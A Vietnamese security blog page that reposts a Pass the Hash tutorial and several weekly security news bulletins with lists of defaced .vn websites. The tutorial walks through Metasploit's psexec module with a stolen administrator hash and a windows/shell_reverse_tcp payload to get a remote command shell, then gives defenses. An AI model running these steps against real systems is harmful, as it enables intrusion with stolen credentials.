Thứ Năm, 10 tháng 3, 2016

Mổ xẻ tấn công Pass the Hash (theo quantrimang)

Là một chuyên gia bảo mật, bạn chắc chắn tập trung rất nhiều vào việc bảo đảm cho các chính sách mật khẩu đủ phức tạp nhằm bảo vệ các mật khẩu không bị crack bởi các cá nhân với các ý định hiểm độc. Trước đây Quantrimang.com của chúng tôi đã giới thiệu cho các bạn một bài viết gồm có hai phần giới thiệu về sự phức tạp của mật khẩu Windows và cách chúng có thể bị crack như thế nào: Mật khẩu Windows có thể bị crack như thế nào. Trong bài này chúng tôi đã cung cấp cho các bạn một kiến thức tổng quan về cách các mật khẩu được hash, được lưu và cách kẻ tấn công có thể bẻ khóa các mật khẩu này như thế nào.
Điều gì sẽ xảy ra nếu chúng tôi nói cho bạn rằng với các trường hợp đã cho, thậm chí không cần crack các mật khẩu của bạn mà vẫn có thể tăng quyền truy cập vào hệ thống như thể đang sử dụng username và password của bạn? Không ám chỉ đến một số khai thác 0-day đã được cải tiến hay các mẹo lừa bạn kích vào một liên kết nào đó trong email giả mạo mà nó có thể được thực hiện hết sức đơn giản với kỹ thuật mang tên Pass the Hash. Trong bài viết này, chúng tôi sẽ giới thiệu cho các bạn về kỹ thuật này làm việc như thế nào, minh chứng quá trình được sử dụng để lấy các hash mật khẩu bị đánh cắp và sử dụng chúng thành công mà không cần crack nội dung đã được ẩn giấu của chúng. Một vấn đề bao giờ cũng được nói đến nữa đó là, chúng tôi sẽ giới thiệu một số kỹ thuật phát hiện và phòng chống theo cách có thể ngăn chặn việc bạn trở thành nạn nhân của tấn công này.
Hash mức gói dữ liệu
Bất cứ khi nào bạn tạo một mật khẩu cho một tài khoản nào đó trong Windows, nó sẽ biến đổi mật khẩu đó thành một hash. Một hash là kết quả của quá trình mã hóa được thực hiện bằng cách lấy một chuỗi dữ liệu với kích thước tùy tiện, sau đó thực hiện mã hóa toán học cho chuỗi dữ liệu này, kết quả trả về là một chuỗi với kích thước cố định nào đó. Kết quả cuối cùng thay vì có một mật khẩu “PassWord123”, bạn sẽ có chuỗi mật khẩu “94354877D5B87105D7FEC0F3BF500B33”. Điều này có một số ý nghĩa. Trước tiên, nó có nghĩa rằng mật khẩu của bạn không nằm trên ổ cứng cục bộ được lưu dưới dạng văn bản trong sáng, nơi bất cứ ai cũng có thể truy cập nó, thứ hai là mật khẩu của bạn không được truyền đi qua mạng dưới định dạng văn bản trong sáng khi bạn nhận thực thiết bị khác (chẳng hạn như domain controller). Chúng tôi sẽ không rehash cách các hash được tạo như thế nào trong bài viết này, tuy nhiên nếu bạn muốn xem lại quá trình này làm việc như thế nào, bạn có thể tham khảo lại bài viết về cách crack mật khẩu Windows tại đây.
Khi cố gắng truy cập vào một tài nguyên nào đó trên máy tính được bảo vệ bằng biện pháp nhận thực username và password, bạn sẽ gặp khó khăn về vấn đề nhận thực bởi host. Về cơ bản, bạn cần cung cấp username và password. Khi đánh vào mật khẩu, máy tính của bạn sẽ thực hiện hành động hash trên mật khẩu và đệ trình nó tới host để nó sau đó sẽ được so sánh với cơ sở dữ liệu nhận thực. Nếu kết quả tương xứng, bạn sẽ truy cập thành công.

Hình 1: Cố gắng kết nối dựa trên sự nhận thực thông thường
Giờ đây chúng ta hãy đi xem xét một kịch bản khác. Điều gì sẽ xảy ra khi thiết lập thủ công một kết nối tới host có tài nguyên mà chúng ta muốn truy cập, tuy nhiên thay vì cung cấp cho nó username và password không có đặc quyền, chúng ta cung cấp lại cung cấp username của Administrator và administrator hash mà chúng ta đã đánh cắp? Cần nhớ rằng, tất cả những gì ở đây host quan tâm là việc nhận một hash tương ứng với những gì nó mong đợi. Điều đó có nghĩa rằng bạn không phải thực hiện chức năng hash một chiều trên mật khẩu mà chỉ cần cung cấp hash, đó cũng là những gì cơ bản nhất cho tấn công này.

Hình 2: Pass the hash trực tiếp host đích

Sử dụng Metasploit để Pass the Hash
Chúng tôi đã giới thiệu cho các bạn lý thuyết nằm phía sau tấn công còn giờ đây là lúc thực thi nó. Trong thử nghiệm này, chúng tôi sẽ pass một hash đánh cắp của một người dùng có đặc quyền quản trị viên vào một hệ thống nạn nhân. Để thực hiện nhiệm vụ này, chúng ta cần hai thứ. Đầu tiên, chúng ta cần một hash đánh cắp của người dùng quản trị. Có nhiều phương pháp khác nhau để có thể thu được hash mật khẩu, bạn có thể tham khảo các cách thực hiện tại đây. Cùng với hash đánh cắp, chúng ta cần một copy Metasploit, đây là một công cụ mà chúng ta sẽ sử dụng để thực hiện tấn công này.
Metasploit là một framework dành cho việc thử nghiệm sự thâm nhập (miễn phí) được phát triển bởi HD Moore, hiện nay là của Rapid7. Bạn có thể download Metasploit về máy tại đây.
Một cách khác, bạn có thể download và sử dụng Backtrack 4. BT4 là một phân phối Linux live-CD được thiết kế đặc biệt cho việc hack và test sự thâm nhập đi kèm với vô số công cụ cài đặt và biên dịch trước, trong đó có cả Metasploit. Bạn có thể download BT4 tại đây. Sau khi download về máy, bạn sẽ tìm thấy Metasploit trong thư mục /pentest/exploit/framework3. Các hình ví dụ được sử dụng trong phần còn lại của bài viết này được lấy từ BT4.
Với hash đánh cắp và Metasploit trong tay, chúng ta sẽ bắt đầu chuẩn bị cho việc tấn công. Để bắt đầu, bạn phải khởi chạy giao diện điều khiển Metasploit. Trong BT4, bạn có thể thực hiện bằng cách duyệt đến thư mục/pentest/exploit/framework3 và đánh ./msfconsole.

Hình 3: Khởi chạy giao diện Metasploit
Metasploit là một framework, phụ thuộc vào việc sử dụng các modul khác nhau để thực hiện các hành động của nó. Trong trường hợp này, chúng ta sẽ sử dụng modulpsexec. Psexec là một công cụ rất phổ biến và được sử dụng để thực thi các quá trình trên hệ thống từ xa và redirect đầu ra của các quá trình đó trở lại hệ thống mà bạn đang sử dụng. Để sử dụng modul này, đánh use windows\smb\psexec và nhấnEnter. Shell sẽ nhắc bạn thay đổi sao cho tương ứng với việc sử dụng modul này.

Hình 4: Sử dụng modul psexec
Tiếp đến chúng ta cần thiết lập tải trọng đang phân phối. Metasploit sẽ mở một kết nối cơ bản đến nạn nhân của chúng ta để khi username và hash đã cung cấp cho chúng ta sự nhận thực đúng cách, tải trọng sẽ phát hiện những gì đang được thực thi bằng cách sử dụng psexec. Trong trường hợp này, chúng ta có tất thực hiện tất cả các kiểu ý định xấu đối với nạn nhân thay vì mở một chương trình gì đó. Một trong các phương pháp hiệu quả cho việc thực hiện là sử dụng một TCP shell ngược. Đây là tải trọng sẽ thực thi một instance của cmd.exe và chuyển nó trở lại qua kết nối của chúng ta để từ đó chúng ta có thể truy cập nó từ xa. Để sử dụng tải trọng này, đánh set payload windows/shell_reverse_tcp.

Hình 5: Thiết lập tải trọng cho TCP shell ngược
Để sử dụng modul và tải trọng này, có một vài tùy chọn mà chúng ta cần phải cấu hình. Để thấy các tùy chọn, bạn có thể đánh vào một số tùy chọn được hiển thị và nhấn Enter.

Hình 6: Các tùy chọn có thể cấu hình cho modul và tải trọng hiện hành
Để thiết lập các tùy chọn cần thiết cho công việc của mình, chúng ta cần sử dụng cú pháp “set [option name] [value]”. Các giá trị cần được thiết lập:
  • RHOST – Địa chỉ IP của nạn nhân
  • SMBPass – Hash đánh cắp của nạn nhân
  • SMBUser – Username của nạn nhân
  • LHOST – Địa chỉ IP của máy tính đang tấn công của bạn
Trong hầu hết các trường hợp, chỉ có bốn tùy chọn cần được cấu hình, còn các tùy chọn khác có thể để mặc định. Khi cấu hình tất cả các tùy chọn này, đầu ra các tùy chọn sẽ tương đồng như những gì trong hình 7:

Hình 7: Các tùy chọn hoàn chỉnh cho tấn công này
Tại đây, tất cả sự chuẩn bị đã đầy đủ và chúng ta có thể thực thi tấn công. Để thực hiện tấn công, hãy đánh exploit và nhấn Enter. Nếu thành công, bạn sẽ thấy màn hình tương tự như đầu ra hiển thị trong hình 8, một Windows command shell. Lúc này chúng ta có thể điều khiển máy tính mà không cần biết mật khẩu của người dùng quản trị.

Hình 8: Khai thác thành công cho chúng ta một Windows command shell
Phòng chống Pass the Hash
Pass the hash là một hành động rất khó phát hiện và ngăn chặn do bản tính của cách nó khai thác quá trình nhận thực. Có một số thứ bạn có thể thực hiện:
  • Kiểm tra hệ thống phát hiện xâm nhập – Từ phối cảnh của một IDS, bạn chắc chắn không thể bắt được tấn công đang thực hiện pass the hash vì nó hầu như giống một chuỗi nhận thực thông thường. Mặc dù vậy vẫn có thể thành công trong việc bắt kẻ tấn công dựa trên các hành động được thực hiện sau khi chúng tăng quyền truy cập. Cho ví dụ, trong kịch bản ví dụ, bạn chắc chắn sẽ không thấy IDS cảnh báo về việc pass của hash đối với máy tính nạn nhân, tuy nhiên bạn sẽ thấy một cảnh báo khi psexec tạo một shell và gửi nó trở lại qua mạng. Điều này cho phép bạn có thể phát hiện tấn công khi xảy ra và đáp trả thích hợp với vụ việc.
  • Cách ly các hệ thống nhạy cảm – Tất cả các máy tính đều được cho là có chứa dữ liệu nhạy cảm cần được cách ly trong mạng. Sử dụng cấu hình router và firewall thích hợp bạn có thể hạn chế sự truy cập vào các máy tính chứa dữ liệu nhạy cảm này, chỉ dành cho nó các host tin cậy. Điều này sẽ ngăn chặn được người dùng trên các máy tính khác có thể sử dụng kỹ thuật pass the hash để tăng quyền truy cập vào hệ thống nhạy cảm.
  • Nhận thực hai hệ số - Sử dụng mật khẩu là phương pháp nhận thực duy nhất đang trở thành lỗi thời. Để nhận thực người dùng tốt hơn, nó cần phải gồm có hai đến ba hệ số. Các hệ số này là những thứ bạn biết (mật khẩu), thứ gì đó bạn có (thẻ thông minh) và thêm vào đó là một số thứ như (võng mạc, dấu vân tay). Sự kết hợp các yếu tố trên sẽ tránh người dùng có thể nhận thực một hệ thống khi họ chỉ có mật khẩu và hash đánh cắp.
  • Hạn chế truy cập quản trị - Càng nhiều tài khoản người dùng có mức truy cập quản trị vào hệ thống mạng, khi đó khả năng các hash của họ bị đánh cắp và được sử dụng để truy cập vào các máy tính với một mức đặc quyền càng cao. Để tránh điều đó, bạn luôn cần thực hiện hành động thẩm định để phát hiện xem mỗi người dùng có truy cập mức quản trị có quả thực cần nó để hạn chế bề mặt tấn công của mình.
Kết luận
Pass the hash là một kỹ thuật rất dễ thực hiện và rất hiểm độc cho nạn nhân. Như những gì bạn đã thấy qua bài này, tất cả những gì cần để thực hiện tấn công này là một cặp công cụ và một chút động cơ, khi đó kẻ tấn công có tất cả những gì hắn cần để làm tê liệt cơ sở hạ tầng của bạn. Hy vọng với sự hiểu biết về tấn công này và một số chiến lược phát hiện cũng như ngăn chặn mà chúng ta đã thảo luận, bạn sẽ chuẩn bị một cách chu đáo hơn để phòng chống và đáp trả với kiểu tấn này.

Bản tin an toàn thông tin tuần 3 tháng 1 (theo securitydaily.net)

1. Cảnh báo

Mac OS X nguy cơ bị tấn công mã độc thông qua Gatekeeper
Lỗ hổng nằm ngay trong bản vá tính năng Gatekeeper của Apple. Tin tặc có thể lợi dụng giả mạo chứng chỉ bảo mật để bypass cài đặt ứng dụng độc hại. Người dùng được khuyến cáo thận trọng khi tải về ứng dụng từ Internet. Công cụ Ostiarius cũng phát hành giúp kiểm tra toàn bộ file thực thi và chặn mã độc không đáng tin cậy từ Internet.
OpenSSH vá lỗ hổng nghiêm trọng rò rỉ khóa mã hóa
OpenSSH vừa tung ra bản vá dành cho một lỗ hổng nghiêm trọng có thể bị khai thác nhằm buộc client rò rỉ chìa khóa mã hóa (khóa riêng tư).Tin tặc có thể kiểm soát một  máy chủ độc hại nhằm buộc client giao nộp khóa.
Phát hiện lỗ hổng Zero-day mới trong Linux Kernel
Lỗ hổng nghiêm trọng Linux kernel (CVE-2016-0728) được phát hiện bởi một nhóm các nhà nghiên cứu Perception Point. Lỗ hổng nằm trong đoạn code từ năm 2012 và ảnh hưởng đến tất cả các hệ điều hành với Linux kernel 3.8 hoặc cao hơn. Hàng triệu máy tính (cả 32bit và 64bit) có nguy cơ bị ảnh hưởng.
Lỗ hổng iOS mới cho phép tin tặc đánh cắp cookie
Apple vừa mới vá một lỗ hổng nghiêm trọng trong hệ điều hành iOS cho phép tin tặc giả mạo danh tính người dùng đầu cuối bằng cách chiếm đoạt cookie xác thực không mã hóa. Lỗ hổng đã được vá trong phiên bản iOS 9.2.1 phát hành vào thứ ba tuần này, sau gần 3 năm kể từ lần đầu phát hiện. Lỗ hổng có tên “Captive Portal” do các nhà nghiên cứu Adi Sharabani và  Yair Amit báo cáo đến Apple từ tháng 7/2013.

2. Tin tức

LastPass gặp rắc rối với tấn công lừa đảo
Thông báo hiển thị bởi LastPass phiên bản 4.0 trong trình duyệt web có thể bị giả mạo, lừa người dùng giao nộp thông tin tài khoản và thậm chí cả passcode xác thực cấp một lần.
Google tăng tốc Chrome với thuật toán nén mới
Thuật toán nén web mới, dữ liệu mã nguồn mở có tên Brotli, được Google ra mắt vào năm ngoái có khả năng tăng tốc đáng kể hiệu xuất làm việc của Chrome. Google cho biết thuật toán mới này là một định dạng dữ liệu hoàn toàn mới có thể giảm dung lượng lên tới 26% so với Zopfli – công nghệ nén 3 năm tuổi của Google.
Top những mật khẩu “không thể tin được”
Có những điều dường như không bao giờ thay đổi – những mật khẩu tệ nhất do loài người tạo ra như ‘123456’ hay ‘passwork’.

Bản tin An toàn thông tin tuần 3 tháng 2 (theo securitydaily.net)

Hơn 60 website của Việt Nam bị hack và thay đổi giao diện, lỗ hổng nghiêm trọng trong thư viện Linux ảnh hưởng hầu hết các thiết bị Linux, mã độc ransomware ẩn dấu trong file Word với sự trở lại của Macro… là những tin tức An toàn thông tin nổi bật trong tuần qua.

1. CẢNH BÁO

Twitter vá lỗ hổng rò rỉ thông tin của hơn 10,000 người dùng
Một lỗ hổng ảnh hưởng đến hệ thống khôi phục mật khẩu của Twitter trong vòng 24 giờ đồng hồ. Một vài người đã khai thác lỗ hổng để lấy được thông tin email và số điện của người dùng khác và đăng tải lên Twitter với mục đích khoe khoang. Người dùng cần xem xét an ninh tài khoản thường xuyên và khuyến cáo sử dụng mật khẩu mạnh, thu hồi giấy phép từ các bên thứ ba nhằm tránh việc rò rỉ thông tin, bật tính năng xác thực hai nhân tố, xem xét các hoạt động bất thường và các phiên đăng nhập.
Lỗ hổng nghiêm trọng trong thư viện của Linux
Một lỗ hổng nghiêm trọng mới được phát hiện trong GNU C Library (glibc), một thành phần cốt lõi trong hầu hết các bản phân phối Linux. Lỗ hổng ảnh hưởng tới gần như tất cả hệ thống Linux và hàng ngàn ứng dụng cũng như các thiết bị có nguy cơ bị tin tặc chiếm quyền kiểm soát.
Mã độc Android có thể root thiết bị và xóa mọi thứ
Mazar BOT là một mã độc Android được phát tán thông qua SMS. Mã độc có nhiều khả năng nguy hiểm phải kể đến việc đoạt quyền truy cập gốc, xóa bộ nhớ và theo dõi hoạt động người dùng.

2. Tin tức An toàn thông tin

Biến iPhone hoặc iPad thành “cục gạch”
Một bug phần mềm khá thú vụ được phát hiện trên hệ điều hành Apple iOS có thể khiến bạn biến iPhone, iPad hoặc iPod thành “cục gạch” đúng nghĩa.  Khi thay đổi cài đặt ngày tháng thiết bị iOS sang 1/1/1970 sẽ khiến iPhone bị treo liên tục. Giải pháp được đề ra là chờ iPhone hết pin và thiết bị sẽ sử dụng lại được bình thường.
Máy tìm kiếm Deep Web – khám phá “phần chìm” của Internet
Có một phần của thế giới internet chưa được biết đến được gọi là web chìm (web sâu, ẩn, tàng hình…) – tiếng Anh là Deep Web (hay Deep Net, Undernet, Invisible Web…) mà chúng ta không thể truy cập thông qua máy tìm kiếm hay trình duyệt thông thường. Deep Web ước tính lớn gấp 500 lần phần Internet mà chúng ta vẫn thường đang sử dụng.
Bản cập nhật lỗi từ Microsoft khiến Windows7/8.1 khởi động lại liên tục
Phát hành các bản cập nhật lỗi dường như trở thành một thói quen với Microsoft. Bản cập nhật mới KB3126446 được tung ra vào thứ ba trong Patch Tuesday tháng 2/2016 khiến hệ thống Windows 7 rơi vào trạng thái khởi động lại liên tục.
Instagram bổ sung xác thực hai nhân tố ngăn ngừa tài khoản bị hack
Instagram xác nhận bắt đầu tung ra xác thực hai nhân tố cho hơn 400 triệu người dùng. Không thể chống lại hoàn toàn nạn hack tài khoản trực tuyến, nhưng ít nhất bạn cũng được bảo vệ một phần nào đó.

3. Cảnh báo các website bị tấn công

Trong tuần, theo nguồn Zone-h (Một trang thống kê về các website bị hack) tuần vừa qua đã có 68 tên miền.vn (tên miền của các website hoạt động tại Việt Nam) bị tấn công bị tấn công và thay đổi giao diện.
  • thietkeao.com.vn/dss.php
  • lacasaspa.vn/krd.html
  • ehomegiare.vn/krd.html
  • truyenhinhcapfpt.vn/krd.html
  • lexuschinhhang.vn/krd.html
  • ppnss.com.vn/xxx.htm
  • vshome.com.vn/krd.html
  • vainhapkhau.com.vn
  • thucphamsaigon.com.vn
  • www.ideacoffee.vn/reutht.php
  • vfix.vn/reutht.php
  • zumsport.vn/reutht.php
  • vtex.vn/reutht.php
  • voip.phanmemtot.vn/krd.html
  • www.anyland.vn/Gass.html
  • http://www.maygachkhongnung.com.vn/Gass.html
  • alumni.emmasia.udn.vn/aan.htm
  • muare24h.com.vn
  • edutainment.edu.vn
  • gianhangtructuyen.com.vn
  • datxuong.com.vn/eg.htm
  • myno.vn
  • mhtgroup.vn
  • galaxydecor.vn/x.php
  • tinycake.vn/newfile.php
  • www.opal.com.vn/i87.htm
  • baobisaigon.com.vn/by.htm
  • cardealers.vn/by.htm
  • cgat.vn/by.htm
  • chauduc-brvt.edu.vn/by.htm
  • forum.ongbien.vn/by.htm
  • hohuynhky.vn/by.htm
  • mepro.vn/by.htm
  • ongbien.vn/by.htm
  • otoviet.com.vn/by.htm
  • phil.vn/by.htm
  • quangminhcorp.vn/by.htm
  • seacretvietnam.com.vn/by.htm
  • tapioca.vn/by.htm
  • thegioimynghe.vn/by.htm
  • thientan.vn/by.htm
  • troyint.com.vn/by.htm
  • tuoitrebariavungtau.vn/by.htm
  • vienthongsaigon.vn/by.htm
  • viethuy.vn/by.htm
  • wte.edu.vn/by.htm
  • chuamatsua.vn
  • travelpro.com.vn/Gass.html
  • alliance.com.vn/Gass.html
  • www.longthuan.com.vn/Gass.html
  • vietpigs.com.vn/1.html
  • newlands.com.vn/1.html
  • topgreen.vn/1.html
  • www.vietliengroup.vn/1.html
  • www.lasuco.vn/1.html
  • lasuco.com.vn/1.html
  • itcare.com.vn/1.html
  • cucthongke.vn/1.html
  • www.phuocanhseafood.com.vn/E.php
  • chevroletbienhoadn.com.vn/chevrolethacked.txt
  • quangtritv.vn/security/lang.tmp
  • raovathaiphong.net.vn/Images/JJ.html
  • tieuhocthinhquang.edu.vn/Gass.html

Bản tin An toàn thông tin tuần 1 tháng 3 (theo securitydaily.net)

Hơn 226 website của Việt Nam bị tấn công và thay đổi giao diện, cảnh báo lỗ hổng nghiêm trọng trong bộ thư viện OpenSSL, mã độc tống tiền tấn công ác máy chủ máy chủ web, mã độc quảng cáo do chính các nhà cung dịch vụ Internet phát tán … là những tin tức An toàn thông tin nổi bật trong tuần vừa qua.

1. CẢNH BÁO

Mã độc tống tiền CTB-Locker phát tán mạnh mẽ, lây nhiễm hàng trăm ngàn máy chủ web
Chiếm kiểm soát và mã hóa dữ liệu website là hướng biến đổi mới nhất của mã độc có tên “CTB-Locker for Websites“. Hiện tại rất nhiều website và chủ yếu là các trang WordPress bị lây nhiễm CBT-Locker. Quản trị viên website cần sử dụng các bản sao lưu sạch để đưa trang web trở lại hoạt động bình thường, chi tiết.
Lỗ hổng OpenSSL ảnh hưởng hơn 11 triệu website sử dụng bộ thư viện OpenSSL
Một lỗ hổng cực kì nguy hiểm mới được phát hiện trong OpenSSL có tên DROWN. Nó có thể được khai thác để thực hiện một cuộc tấn công giải mã dữ liệu nhạy cảm, can thiệp kết nối HTTPS bảo mật bao gồm mật khẩu và thông tin thẻ thanh toán. Người dùng OpenSSL 1.0.2 được khuyến cáo nâng cấp lên OpenSSL 1.0.2g. Người dùng OpenSSL 1.0.1 được khuyến cáo nâng cấp lên OpenSSL 1.0.1s, chi tiết
Đánh cắp khóa giải mã bí mật từ điện thoại Android và iOS
Một nhóm chuyên gia an ninh mạng đến từ đại học Tel Aviv, Technion và Adelaide đã tiến hành thử nghiệm một cuộc tấn công đánh cắp khóa mã hóa được sử dụng trong các ví tiền Bitcoin, tài khoản Apple Pay và các dịch vụ nhạy cảm cao từ thiết bị Android và iOS. Đây cũng là nhóm các nhà nghiên cứu đã thử nghiệm thành công hàng loạt các cuộc xâm nhập để trích xuất dữ liệu từ máy tính, chi tiết./.
Phát hiện các ISP của Trung Quốc lây nhiễm mã độc và quảng cáo
Gần đây, Trung Quốc gây được nhiều quan tâm với những chính sách Internet trong những năm qua như công cụ tìm kiếm riêng, tường lửa kiểm duyệt và hệ điều hành riêng. Không dừng lại ở đó, các nhà cung cấp dịch vụ Internet tại Trung Quốc tiếp tục gây chú ý với việc lây nhiễm các quảng cáo và mã độc thông qua lưu lượng của mình.

2. Tin tức An toàn thông tin

Subgraph OS – Hệ điều hành Linux an toàn dành cho người dùng phổ thông
Sau khi Windows 10 phát hành thành công nhưng gặp nhiều chỉ trích về các tính năng xâm hại quyền riêng tư người dùng, ngày càng nhiều người dùng đang dần chuyển sang Linux. Tuy nhiên, vấn đề với phần lớn người dùng là không quen thuộc với môi trường Linux. Họ không biết cách cấu hình thiết bị với các thiết đặt riêng tư và bảo mật, càng khiến dễ dàng bị tấn công và do thám. Chính điều đó đã tạo nên một hệ điều hành có tên Subgraph OS – giải pháp xóa tan lo lắng về quyền riêng tư cũng như phù hợp với người dùng mới sử dụng Linux.
Chính phủ Mỹ thách thức hack Lầu Năm Góc
Bộ Quốc phòng Mỹ đang có kế hoạch nâng cao khả năng an ninh mạng của mình bằng cách kêu gọi một chương trình Bug Bounty lần đầu tiên của chính phủ, chính thức mời hacker tham gia cuộc thi tấn công Lầu Năm Góc.
Pháp có thể phạt Apple 1 triệu Euro với mỗi chiếc iPhone bị từ chối mở khóa
Mỹ không phải là nơi duy nhất Apple đang đấu tranh với cơ quan chức năng trong việc mã hóa iPhone. Apple sẽ có thể phải đối mặt với 1 triệu Euro tiền phạt mỗi lần công ty này từ chối mở khóa một chiếc iPhone tại Pháp.
Phó giám đốc Facebook tại Brazil bị bắt vì từ chối chia sẻ dữ liệu WhatsApp
Apple không phải là công ty công nghệ duy nhất đấu tranh pháp lí trong các vụ án. Cảnh sát Brazil vừa mới bắt giữ phó giám đốc Facebook khu vực Mỹ Latinh vì không tuân theo yêu cầu của tòa án phục vụ cơ quan chức năng điều tra đường dây buôn bán ma túy.

3. Website bị tấn công

Trong tuần qua, hơn 226 tên miền .vn (tên miền của các website hoạt động tại Việt Nam, do cơ quan quản lý của Việt Nam cấp phép) bị tấn công bị tấn công và thay đổi giao diện. Trong đó bao gồm một số website của cơ quan chính phủ Việt Nam, tên miền .gov.vn và một số website của các cơ quan giáo dục Việt Nam. 226 website bị tấn công là con số lơn và đột biến trong thời gian đầu tháng 3 vửa qua. Đặc biệt trong ngày 03/03 có đến hơn 200 website bị tấn công và thay đổi nội dung.

Bản tin an ninh mạng tuần 11 năm 2015(SD.net)

1. Cảnh báo từ VNIST TaskForce Team

Nhóm DIE Group công khai hơn 50.000 khách hàng của VNPT
Cảnh báo lỗ hổng bảo mật nhưng không nhận được phản hồi từ đơn vị chủ quản website và lỗ hổng bảo mật cũng không được khắc phục. Nhóm hacker DIE Group đã công khai danh sách thông tin khách hàng của một đơn vị thành viên của Tập đoàn Bưu chính Viễn thông Việt Nam – VNPT lên Internet và nhóm DIE Group Facebook. Theo thông tin mà nhóm công bố thì số lượng khách hàng là 10.000 nhưng qua xác minh, làm rõ VNIST Corp phát hiện số lượng các thông tin này cao hơn rất nhiều, con số lên đến hơn 50.000 thông tin cá nhân.
USB Killer có thể gây nổ máy tính
Một nhà nghiên cứu người Nga có nickname là Dark Purple đã phát triển một loại USB độc hại, có khả năng gây nổ máy tính sau khi kết nối. Thiết bị tên là Killer USB, có khả năng tiêu diệt hiệu quả các thành phần nhạy cảm của máy tính.
#Khuyến cáo: Trong thời gian tới, nếu người dùng tìm thấy một ổ đĩa USB không rõ ràng, hãy cẩn thận trước khi cắm nó vào laptop. Bởi thay vì làm cháy, làm hỏng các tập tin quan trọng hoặc dữ liệu được lưu trữ trên máy tính của người dùng giống như các loại mã độc thường làm thì nó sẽ làm cháy hoàn toàn chiếc máy tính của bạn.

2. Tình hình an ninh mạng trong nước

HLU2
Trang website chính thức của trường đại học Luật bị hacker tấn công và thay đổi giao diện
Vào khoảng 20h ngày 08/03/2015, website chính thức của trường ĐH Luật Hà Nội tại địa chỉ: hlu.edu.vn đã bị 1 nhóm tin tặc tấn công và thay đổi giao diện. Theo thông tin mà nhóm tin tặc này để lại thì rất có thể nhóm này có nguồn gốc từ Trung Quốc. Lỗ hổng đã được khai thác trên website có thể là lỗi SQL Injection.
Nhóm tin tặc DIE Group công khai danh sách 25 website đã bị nhóm tấn công
hacked
Khoảng 20h tối ngày 10 tháng 3, nhiều website của Việt Nam đã bị tấn công chiếm quyền điều khiển. Giao diện của các trang web này đã bị thay đổi (defacement) với nội dung “treo cờ, phát nhạc” của hacker.

3. Tình hình an ninh mạng trên thế giới

Lỗ hổng trong Google Apps làm rò rỉ thông tin mật WHOIS của 280,000 trang web
Google vừa thông báo đến hàng trăm nghìn người sử dụng domain rằng thông tin mật WHOIS đã bị rò rỉ dưới dạng văn bản rõ ràng. Hiện tại, nhiều người dùng đang phải đối mặt với rất nhiều vấn đề liên quan tới việc đánh cắp danh tính, lừa đảo và nhiều hơn nữa.
Adobe vá 11 lỗ hổng nghiêm trọng trong Flash Player
Adobe đã tung ra bản cập nhật Flash Player vá 11 lỗ hổng bảo mật. Hầu hết trong số chúng liên quan đến thực thi mã từ xa. Bản cập nhật được phát hành trong một tuần đầy bận rộn đối với các nhà quản trị IT khi Microsoft cũng tung ra bản vá Patch Tuesday vá lỗ hổng FREAK và bản sửa lỗi mới cho bản vá cũ Stuxnet từ năm 2010.
Samsung vá lỗ hổng trong SNS Provider ảnh hưởng đến hàng triệu thiết bị
Samsung vừa vá một lỗ hổng phát hiện tháng trước trong SNS Provider, một ứng dụng phổ biến quản lí các mạng xã hội khác trong hàng triệu thiết bị. Nếu khai thác được lỗ hổng này, tin tặc có thể truy cập vào bất cứ thông tin cá nhân người dùng lưu trữ trên Facebook, Linkedln và Twitter.
Hack tài khoản Facebook với công cụ Reconnect
Hiện nay, khi người dùng truy cập trên nhiều trang web thường hiện lên câu hỏi: “Đăng ký hoặc Đăng nhập với Facebook?”. Người dùng nên cẩn thận trước khi nhấp vào tùy chọn. Bởi theo một nhà nghiên cứu bảo mật, có một lỗ hổng nghiêm trọng cho phép tin tặc chiếm quyền tài khoản Facebook trên các trang web mà có tùy chọn “Đăng nhập bằng Facebook” như vậy.
Lỗ hổng không cho phép hacker truy cập vào mật khẩu Facebook thật sự của người dùng, nhưng nó lại cho phép hacker truy cập vào tài khoản người sử dụng thông qua ứng dụng Facebook mà các trang web của bên thứ ba phát triển, chẳng hạn như Bit.ly, Mashable, Vimeo, About.me, Stumbleupon, Angel.co và có thể nhiều hơn nữa.
Microsoft tung ra bản vá cho lỗ hổng Freak và lỗ hổng mà Stuxnet đã khai thác
Windows gần đây gặp một vài rắc rối với việc để lộ rằng họ chưa hoàn thành bản vá cho lỗ hổng được khai thác bởi Stuxnet từ năm 2010. Trong bản cập nhật hàng tháng “Patch Tuesday” ra mắt mới đây Microsoft đã cập nhật bản vá cho lỗ hổng mà Stuxnet và nhiều lỗ hổng khác trong đó có lỗ hổng nguy hiểm Freak.
Cảnh báo μTorrent cài đặt ngầm phần mềm đào Bitcoin
torrent
Người dùng dịch vụ chia sẻ file μTorrent gần đây phàn nàn rằng phiên bản mới nhất mà họ sử dụng cài đặt ngầm một phần mềm không mong muốn có tên EpciScale được dùng để đào Bitcoin. Nếu bạn cài đặt hoặc cập nhật μTorrent 3.4.2 Build 28913 thì bạn nên đọc cảnh báo này.
4. Tổng hợp số lượng website bị tấn công
Theo hệ thống giám sát và thu thập của SecurityDaily.NET, trong tuần vừa qua (từ ngày 08 đến 15/03/2015) đã phát hiện
  • 167 trang web có tên miền của Việt Nam dưới tên miền .vn bị tấn công.
  • Có đến 44 trang web với tên miền .edu.vn của các cơ quan giáo dục và duy nhất một website của cơ quan Nhà nước Việt Nam. Hai nhóm tin tặc thực hiện tấn công nhiều nhất là nhóm LVH (đã tấn công 54 website) và DIE Group (tấn công 25 trang web).
  • Theo thông tin mà SecurityDaily nhận được thì đây là hai nhóm tin tặc này đều đến từ Việt Nam. Ngoài ra còn nhiều nhóm tin tặc khác đến từ các quốc gia như: Indonexia, Thổ Nhĩ Kỳ…

Điểm tin An ninh mạng tháng 9/2015

Việt Nam tổ chức cuộc thi an ninh an toàn thông tin quy mô toàn cầu đầu tiên
Điểm tin An ninh mạng tháng 9/2015

Ngày 23/09, Tập đoàn công nghệ Bkav công bố tổ chức cuộc thi An ninh mạng toàn cầu WhiteHat Grand Prix – Global challenge 2015. Đây là cuộc thi an ninh an toàn thông tin quy mô toàn cầu đầu tiên do Việt Nam tổ chức, với giải Nhất trị giá 225 triệu VND.

Vòng đấu loại cuộc thi diễn ra liên tục trong 24 giờ, từ ngày 24 đến ngày 25/10, trực tuyến tại địa chỉ WhiteHatVN.com. Vòng chung kết kéo dài 8 giờ liên tục theo hình thức tấn công/phòng thủ (Attack/Defense) sẽ diễn ra trực tiếp tại Hà Nội ngày 19/12 với sự tham gia của 10 đội đứng đầu vòng loại đến từ tất cả các quốc gia trên thế giới.

WinRAR có lỗ hổng nghiêm trọng chưa được vá

Điểm tin An ninh mạng tháng 9/2015

